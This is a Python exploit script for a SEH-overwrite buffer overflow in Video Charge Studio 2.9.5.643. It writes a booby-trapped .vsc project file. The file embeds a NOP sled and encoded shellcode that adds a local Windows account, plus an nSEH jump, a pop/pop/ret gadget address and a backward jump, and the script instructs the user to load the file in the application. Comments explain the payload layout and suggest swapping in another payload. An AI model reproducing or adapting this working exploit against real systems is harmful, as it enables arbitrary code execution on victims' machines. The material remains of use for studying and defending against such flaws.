#!/usr/bin/python
# Exploit Title: Video Charge Studio <= 2.9.5.643 (.vsc) Buffer Overflow (SEH)
# Date: 12/05/2010
# Author: xsploitedsec
# URL: http://www.x-sploited.com/
# Contact: xsploitedsecurity [at] x-sploited.com
# Software Link: http://www.videocharge.com/download/VideoChargeStudio_Install.exe
# Version: <= 2.9.5.643 (Latest)
# Tested on: Windows XP SP3 (Physical machine)
# CVE: N/A
### Software Description: ###
# Videocharge Studio is a video editing software which is intended for those users who
# regularly work with video, create Internet video galleries, convert video files.
# Videocharge Studio includes all features for video editing: video converting, splitting
# video into parts, joining several video files into a single one, adding watermark on
# video or image (add logo to video or photo), embedding image into video file, creating
# video from several images, editing audio. Videocharge Studio can edit video without
# reencoding as well.
### Exploit information: ###
# Video Charge Studio is prone to a buffer overflow (SEH overwrite) when parsing an
# over-long value field in a .vsc project file. The original advisory calls this the
# "Filename" value field; the file generated below actually places the overflow string
# in the Value name="Name" attribute of the Profiles/Profile/Formats/Format property.
# An attacker could trick a user into loading a specially crafted .vsc file to execute
# arbitrary code on the user's PC without their consent.
### Shouts: ###
# kaotix, sheep, deca, havalito, corelanc0d3r/corelan team, exploit-db crew, packetstormsecurity
# Have fun!
# "When you know that you're capable of dealing with whatever comes, you have the only
# security the world has to offer." -Harry Browne
import struct
import sys
# Banner shown before the file is generated.  The lines are kept verbatim and
# joined, so the printed text is byte-identical to the original banner.
_banner_lines = (
    "=================================================\n",
    " Video Charge Studio <= 2.9.5.643 (.vsc) BoF (SEH)\n",
    " Author: xsploited security\n URL: http://www.x-sploited.com/\n",
    " Contact: xsploitedsecurity [at] gmail.com\n",
    "=================================================\n",
)
about = "".join(_banner_lines)
print(about)
# Generated by the original author with (the "-t perl" output uses the same
# "\x.." escape syntax Python accepts, so it was pasted as-is):
#   msfpayload windows/adduser user=xsploited pass=sec EXITFUNC=seh R |
#   msfencode -e x86/fnstenv_mov -c 1 -t perl \
#     -b '\x00\x09\x0a\x0d\x3e\x3c\x26\x20\x21\x22\x23\x2a\x07'
#   [*] x86/fnstenv_mov succeeded with size 302 (iteration=1)
# The excluded bytes are NUL, BEL, tab, CR/LF, space and the XML-significant
# characters < > & " (plus ! # *), because the payload lands inside an XML
# attribute value.  The EXITFUNC=seh choice matches the SEH-based trigger.
# NOTE(review): windows/adduser creates a local Windows account
# "xsploited" / "sec" on the victim - swap in your own payload for anything
# other than a lab demonstration.
_shellcode_chunks = (
    "\x6a\x46\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xce",
    "\xcf\xb0\x91\x83\xeb\xfc\xe2\xf4\x32\x27\x39\x91\xce\xcf",
    "\xd0\x18\x2b\xfe\x62\xf5\x45\x9d\x80\x1a\x9c\xc3\x3b\xc3",
    "\xda\x44\xc2\xb9\xc1\x78\xfa\xb7\xff\x30\x81\x51\x62\xf3",
    "\xd1\xed\xcc\xe3\x90\x50\x01\xc2\xb1\x56\x2c\x3f\xe2\xc6",
    "\x45\x9d\xa0\x1a\x8c\xf3\xb1\x41\x45\x8f\xc8\x14\x0e\xbb",
    "\xfa\x90\x1e\x9f\x3b\xd9\xd6\x44\xe8\xb1\xcf\x1c\x53\xad",
    "\x87\x44\x84\x1a\xcf\x19\x81\x6e\xff\x0f\x1c\x50\x01\xc2",
    "\xb1\x56\xf6\x2f\xc5\x65\xcd\xb2\x48\xaa\xb3\xeb\xc5\x73",
    "\x96\x44\xe8\xb5\xcf\x1c\xd6\x1a\xc2\x84\x3b\xc9\xd2\xce",
    "\x63\x1a\xca\x44\xb1\x41\x47\x8b\x94\xb5\x95\x94\xd1\xc8",
    "\x94\x9e\x4f\x71\x96\x90\xea\x1a\xdc\x24\x36\xcc\xa4\xce",
    "\x3d\x14\x77\xcf\xb0\x91\x9e\xa7\x81\x1a\xa1\x48\x4f\x44",
    "\x75\x31\xbe\xa3\x24\xa7\x16\x04\x73\x52\x4f\x44\xf2\xc9",
    "\xcc\x9b\x4e\x34\x50\xe4\xcb\x74\xf7\x82\xbc\xa0\xda\x91",
    "\x9d\x30\x65\xf2\xa3\xab\x9e\xf4\xb6\xaa\x90\xbe\xad\xef",
    "\xde\xf4\xba\xef\xc5\xe2\xab\xbd\x90\xe9\xbd\xbf\xdc\xfe",
    "\xa7\xbb\xd5\xf5\xee\xbc\xd5\xf2\xee\xe0\xf1\xd5\x8a\xef",
    "\x96\xb7\xee\xa1\xd5\xe5\xee\xa3\xdf\xf2\xaf\xa3\xd7\xe3",
    "\xa1\xba\xc0\xb1\x8f\xab\xdd\xf8\xa0\xa6\xc3\xe5\xbc\xae",
    "\xc4\xfe\xbc\xbc\x90\xe9\xbd\xbf\xdc\xfe\xa7\xbb\xd5\xf5",
    "\xee\xe0\xf1\xd5\x8a\xcf\xba\x91",
)
shellcode = "".join(_shellcode_chunks)
# Start of the .vsc project XML, up to and including the opening quote of the
# Value name="Name" attribute that receives the overflow string.  Spelled out
# as readable text instead of \x escapes; the bytes are identical.  The
# Windows-1252 declaration is kept from the original file format - the
# attribute value will nevertheless contain arbitrary non-text bytes.
header = (
    '<?xml version="1.0" encoding="Windows-1252" ?>'
    '<config ver="2.9.5.643">\r\n'
    '<cols name="Files"/>\r\n'
    '<cols name="Profiles">\r\n'
    '<Property name="Profile">\r\n'
    '<cols name="Formats">\r\n'
    '<Property name="Format">\r\n'
    '<Value name="Name" type="8" value="'
)
# Closing quote of the overflowed attribute plus the remaining closing tags,
# written as readable text; byte-identical to the original \x-escaped form.
footer = (
    '"/>\r\n'
    '</Property>\r\n'
    '</cols>\r\n'
    '</Property>\r\n'
    '</cols>\r\n'
    '</config>'
)
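# Payload layout (offsets relative to the start of the Value name="Name" string):
#   [0, 824)    NOP sled followed by the shellcode, right-aligned so the shellcode
#               ends exactly where the SEH record begins (824 bytes of junk were
#               found by the original author to reach the handler record).
#   [824, 828)  nSEH: "jmp short +6" hops over the handler address that follows.
#   [828, 832)  SEH: pop/pop/ret gadget in zlib1.dll, which the application ships
#               in its own directory ("universal" per the original author).  The
#               address is specific to that DLL build - re-verify it if the
#               installed zlib1.dll differs.
#   [832, 837)  near "jmp rel32" backwards by 800 bytes; rel32 is taken from the
#               end of the 5-byte instruction, so execution lands at offset 37,
#               inside the sled, and slides into the shellcode at offset 522.
size = 824  # 824 junk bytes trigger the overflow

nseh = "\xEB\x06\x90\x90"                     # jmp short +6 (skips the SEH address)
seh = struct.pack("<L", 0x61B8451C)           # pop/pop/ret - zlib1.dll (app's path)
jmp_back = 800
trampoline = "\xe9" + struct.pack("<i", -jmp_back)  # \xe9\xe0\xfc\xff\xff: jmp -800

sled_len = size - len(shellcode)
landing = size + len(nseh) + len(seh) + len(trampoline) - jmp_back
if sled_len < 0 or not 0 <= landing < sled_len:
    # A different payload would otherwise silently shrink the sled (or shift the
    # SEH record / make the jump land inside the shellcode) and produce a file
    # that just crashes the target.  Fail loudly instead.
    raise SystemExit("[!] shellcode is %d bytes; with a %d-byte buffer the jmp "
                     "back lands at offset %d, outside the NOP sled"
                     % (len(shellcode), size, landing))

payload = "\x90" * sled_len
payload += shellcode
payload += nseh
payload += seh
payload += trampoline
xsploit = header + payload + footer

print("[*] Creating .vsc file")
print("[*] Payload size = %d bytes" % len(payload))
try:
    # Binary mode: text mode would translate the XML's "\r\n" into "\r\r\n" on
    # Windows and may otherwise mangle the raw payload bytes.
    with open("evil.vsc", "wb") as out_file:
        out_file.write(xsploit)
    print("[*] Malicious vsc file created successfully")
    print("[*] Launch Video Charge Studio and load the file\n[*] Exiting...\r\n")
except (IOError, OSError) as exc:
    # Report the actual reason; the previous bare "except:" swallowed everything
    # (including KeyboardInterrupt) and gave no hint why the write failed.
    print("[!] Error creating file: %s" % exc)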